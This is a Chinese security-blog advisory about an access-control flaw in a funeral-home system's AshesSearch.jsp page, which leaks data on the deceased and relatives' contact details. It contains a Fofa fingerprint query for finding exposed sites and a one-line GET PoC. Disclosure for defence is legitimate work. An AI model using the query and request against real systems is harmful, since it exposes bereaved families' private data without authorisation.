文章总结： 本文披露了殡仪馆AshesSearch.jsp页面因访问控制缺失导致的敏感信息泄露漏洞。攻击者无需授权即可直接获取逝者姓名、安葬位置及家属联系方式等隐私数据。建议立即修复权限校验缺陷，实施严格身份认证与敏感数据脱敏处理，以符合隐私保护法规并防范数据泄露风险。 综合评分： 90 文章分类： 信息泄露,WEB安全,漏洞POC,漏洞预警

殡仪馆AshesSearch.jsp信息泄露

原创

158 158

船山信安

2026年2月2日 11:34 湖南

一、漏洞概述（快速掌握核心信息）

✅ 漏洞名称：殡仪馆AshesSearch.jsp信息泄露漏洞

✅ 漏洞编号：暂未分配

✅ 漏洞类型：敏感信息泄露（核心为逝者及家属相关隐私信息）

✅ 影响范围：使用AshesSearch.jsp页面作为骨灰查询、逝者信息检索功能的殡仪馆相关Web系统

✅ 漏洞危害：高危｜无需授权即可访问AshesSearch.jsp页面，泄露逝者姓名、骨灰编号、安葬位置、死亡日期及家属姓名、联系方式等敏感隐私信息，违反殡葬行业信息保护规定，侵害逝者人格利益与家属隐私权，还可能被不法分子利用牟利，引发隐私纠纷与行业信任危机，情节严重者将承担刑事责任[7]

✅ 漏洞原理：殡仪馆Web系统中的AshesSearch.jsp页面（用于骨灰信息查询、逝者信息检索）未设置有效的身份验证、权限管控及访问限制，且未对页面访问请求进行校验，同时未遵循信息保护“最小必要”原则，任何人无需登录、无需授权，直接访问该jsp页面或构造简单请求，即可获取页面中存储、展示的各类逝者及家属敏感隐私信息，属于典型的访问控制缺失导致的信息泄露漏洞

二、资产探测（快速找到可测试目标）

Fofa语法:

web.icon=="0d1a8dfb0a11c6c31599b83f05e90dfc"||body="defaultCRMB.jsp"||body="defaultCRMLogin.jsp"||body="defaultCRM.jsp"

三、漏洞POC（测试漏洞是否存在）

GET /com/byg/ashes/AshesSearch.jsp HTTP/1.1        Host: {{hostname}}        User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36

漏洞复现

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：船山信安 158 158《殡仪馆AshesSearch.jsp信息泄露》